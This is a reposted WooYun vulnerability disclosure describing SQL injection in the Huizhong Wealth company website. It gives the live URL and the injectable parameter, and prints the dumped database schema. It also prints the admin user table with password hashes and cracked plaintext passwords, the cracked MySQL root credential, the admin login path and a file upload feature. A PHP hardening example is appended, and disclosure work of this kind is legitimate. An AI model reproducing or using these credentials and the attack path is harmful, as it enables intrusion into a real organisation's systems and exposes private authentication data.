SQL injection in the 汇中财富 (Huizhong Wealth) portal website allows login to the admin backend

admin | 18 April 2017 02:24:56 | 373 views | 211 characters

Vulnerability summary

Defect ID: WooYun-2016-192647

Title: SQL injection in the 汇中财富 (Huizhong Wealth) portal website allows login to the admin backend

Affected vendor: 汇中财富 (Huizhong Wealth)

Author: 路人甲 (anonymous submitter)

Submitted: 2016-04-05 15:40

Published: 2016-05-20 15:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: www.wooyun.org. For questions or help, please contact

Tags: none


Vulnerability details

Disclosure status:

2016-04-05: Actively contacting the vendor and awaiting acknowledgement; details withheld from the public
2016-05-20: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

See title.

Detailed description:

http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438

Parameter: categoryid

[Screenshot]

DBA privileges

[Screenshot]

Database: ftphzcf
[17 tables]
+-----------------------+
| adminuser             |
| logrecord             |
| tb_ad                 |
| tb_advertisement      |
| tb_advertisementstype |
| tb_area               |
| tb_global             |
| tb_goods              |
| tb_hzlanmu            |
| tb_lanmu              |
| tb_leaveword          |
| tb_menu               |
| tb_newlist            |
| tb_news               |
| tb_rongyu             |
| tb_tag                |
| tb_yuyue              |
+-----------------------+

Database: ftphzcf
Table: adminuser
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| u_adddate | datetime     |
| u_admin   | int(11)      |
| u_id      | mediumint(9) |
| u_name    | varchar(255) |
| u_pwd     | varchar(255) |
+-----------+--------------+

Plaintext passwords (recovered values shown in parentheses):

Database: ftphzcf
Table: adminuser
[8 entries]
+---------------------+---------+------+-------------------+-------------------------------------------------------+
| u_adddate           | u_admin | u_id | u_name            | u_pwd                                                 |
+---------------------+---------+------+-------------------+-------------------------------------------------------+
| 2013-01-24 18:51:17 | 1       | 2    | tlshow            | 92682ec88c76a47981a36929ea33433a082dacb4              |
| 2015-08-04 16:36:53 | 1       | 3    | huizhongcf        | 0211741fb783975439e99b767ed22335be1f9135              |
| 2015-09-16 01:38:07 | 4       | 6    | huizhongjiangtang | 7c222fb2927d828af22f592134e8932480637c0d (12345678)   |
| 2015-09-16 01:44:56 | 3       | 7    | huizhongnews      | 7c222fb2927d828af22f592134e8932480637c0d (12345678)   |
| 2015-10-16 03:12:07 | 2       | 9    | huizhongzhaopin   | 1f4a04e5543d8760660bb080226040b987b88d47 (1122334455) |
| 2015-10-16 03:42:02 | 5       | 10   | huizhongchujie    | 7c222fb2927d828af22f592134e8932480637c0d (12345678)   |
| 2015-10-16 03:42:30 | 6       | 11   | huizhongjiekuan   | 7c222fb2927d828af22f592134e8932480637c0d (12345678)   |
| 2015-10-19 06:44:58 | 7       | 12   | huizhongyunying   | 1f2a1365ff49537b1a41c7cc1bbafad4d166fe86              |
+---------------------+---------+------+-------------------+-------------------------------------------------------+

Database user table:

Database: mysql
Table: user
[6 entries]
+---------+--------------+--------------------------------------------------+
| user    | host         | password                                         |
+---------+--------------+--------------------------------------------------+
| root    | localhost    | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| root    | guanwang-new | <blank>                                          |
| root    | 127.0.0.1    | <blank>                                          |
| root    | ::1          | <blank>                                          |
| <blank> | localhost    | <blank>                                          |
| <blank> | guanwang-new | <blank>                                          |
+---------+--------------+--------------------------------------------------+

Proof of vulnerability:

http://www.huizhongcf.com/winadmin/login.php

Log in with the administrator credentials extracted via the injection above:

[Screenshot]

[Screenshot]

The backend has a file upload function.

[Screenshot]

Fix recommendation:

Filter special characters, enforce a password complexity policy, and hire a security specialist.
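The fix recommendation is only a sketch, and "filter special characters" is weaker than parameterized queries, which remove this bug class outright. As an added example (not code from the report or from the vendor's site), here is the vulnerable pattern beside a hardened PHP version covering both of the report's points, query handling for categoryid and id, and admin password storage; tb_news and the database name ftphzcf come from the dump, while the column names title and body, the web_app account and the 12-character policy are assumptions.

```php
<?php
// Added example, not code from the original report or the vendor's site. It assumes a page
// that selects a news item by the GET parameters categoryid and id; tb_news and ftphzcf are
// in the dump, but the columns title/body and the DB account name are assumptions.

// Vulnerable pattern: GET values are concatenated straight into the SQL text, which is how
// a parameter such as categoryid becomes injectable (and, on a root connection, yields DBA).
function lookupNewsVulnerable(PDO $db, array $get): array
{
    $sql = "SELECT title, body FROM tb_news WHERE categoryid = " . $get['categoryid']
         . " AND id = " . $get['id'];
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: validate both parameters as integers, then bind them in a prepared
// statement so they travel as data and are never parsed as SQL.
function lookupNews(PDO $db, array $get): array
{
    $categoryId = filter_var($get['categoryid'] ?? null, FILTER_VALIDATE_INT);
    $id         = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT);
    if ($categoryId === false || $id === false) {
        return [];   // non-numeric input is rejected; the caller should answer HTTP 400
    }
    $stmt = $db->prepare('SELECT title, body FROM tb_news WHERE categoryid = :cat AND id = :id');
    $stmt->bindValue(':cat', $categoryId, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// adminuser.u_pwd in the dump holds unsalted 40-hex-digit hashes of weak passwords ("12345678"
// four times). Use a salted, slow hash with a minimum length (12 is an assumed policy value).
function hashAdminPassword(string $plain): string
{
    if (strlen($plain) < 12) {
        throw new InvalidArgumentException('password policy: at least 12 characters');
    }
    return password_hash($plain, PASSWORD_DEFAULT);
}

function verifyAdminPassword(string $plain, string $storedHash): bool
{
    return password_verify($plain, $storedHash);
}

// Connect as a dedicated low-privilege account, not the MySQL root seen in the dump, and
// disable emulated prepares so binding happens server-side.
$db = new PDO('mysql:host=localhost;dbname=ftphzcf;charset=utf8mb4', 'web_app',
    getenv('DB_PASSWORD') ?: '',
    [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
```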

Vendor response:

Severity: no impact; vendor ignored

Ignored at: 2016-04-25 09:50

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)

